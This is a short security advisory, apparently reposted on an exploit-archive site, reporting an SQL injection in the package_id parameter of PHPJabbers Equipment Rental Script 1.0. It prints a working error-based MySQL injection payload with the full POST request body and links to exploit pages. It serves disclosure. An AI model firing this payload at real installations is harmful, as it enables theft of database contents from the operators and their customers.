Equipment Rental Script 1.0 SQL Injection

2023.09.13
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: Equipment Rental Script-1.0 - SQLi ## Author: nu11secur1ty ## Date: 09/12/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The package_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the package_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can steal all information from the database! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: package_id=(-4488))) OR 1 GROUP BY CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html) ## Time spent: 00:25:00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top